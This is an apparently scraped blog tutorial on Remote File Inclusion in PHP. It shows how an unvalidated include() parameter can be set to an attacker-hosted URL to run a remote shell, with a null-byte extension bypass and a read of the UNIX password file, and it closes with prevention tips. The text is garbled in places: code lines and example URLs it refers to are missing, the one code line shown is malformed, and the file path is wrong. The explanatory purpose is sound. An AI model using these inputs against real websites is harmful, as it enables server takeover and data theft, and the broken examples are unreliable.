Remote File Inclusion Vulnerability Tutorial~Web application Vulnerability

This is old tutorial but worth to read it. i write this article before 6 months but forget to post. So here i am posting it.

Remote file inclusion is one of web application vulnerability . Using this vulnerabilitiy an attacker can include their remote file such as Shell. This results in website defacement.

Shell is a GUI(Graphical User Interface) file that is used to browse remote files , using this shell you can run your own code on the victim web server.

By running malicious codes on the web server , an attacker take control of the Whole Server.

Using the vulnerability of the web application , an attacker can do:

  •  Execute malicious codes
  •  Denial of service
  • Execute Cross Site Scripting (XSS)
When web application is vulnerable to File Inclusion?

The web application becomes vulnerable because of unvalidated external variables (such as $_POST,$_GET,$_COOKIE). The main vulnerability occurs because of “include” function. This “include( )” function get the another page and include as content in current page. If allow_url_fopen function is enabled in web application, an attacker can include the files remotely.

Let us look into some examples, Consider this PHP code.

include($incfile. ‘php’);

In this code, the second line “$incfile=$_REQUEST[‘News’] ” gets input from HTTP Request (I mean the valued passed in URL ). The second line inlcudes the “NewsFile ” dynamically.

For instance, consider this url:

Here the news1 is passed to NewsFile variable. The above php code get the value of Newsfile variable using the $_REQUEST. $include function will include news1.php file in index page.

Here you have note one thing, the developer doesn’t validate the the HTTP Request input. It causes to vulnerable. An attacker can change the value and launch the Remote file inclusion attack.

How an attacker use this vulnerability?

An attacker can use this vulnerability to inlcude his malicious files. For instance, he can change the value of Variable NewsFile in the url like this:

now the vlaue of NewsFile= http://attackersite/malicous_code. So the include function will become like this:


This leads to include the attacker malicious codes in the victim site. Now the attacker can include any malicious codes and execute in the web server. Attacker will upload the shell code and gain the access to the remote files of the website.

Null Meta Character():

An attacker can upload the text files also. But how, It ends with .php in include function ? Using null meta chracter, attacker can eliminate the .php extension. For example by including the NewsFile value as: http://attackersite/malicous_code.txt. Here will eliminate the .php code. So now he can upload any type of files also.

By giving NewsFile vaule as =/etc/password, Attacker can read the contents of password file on UNIX system directory traversal.

Prevention over the RFI

  • Disable the register_globals and allow_url_fopen and allow_url_include in PHP.ini file.
  •  Validate the Use Input.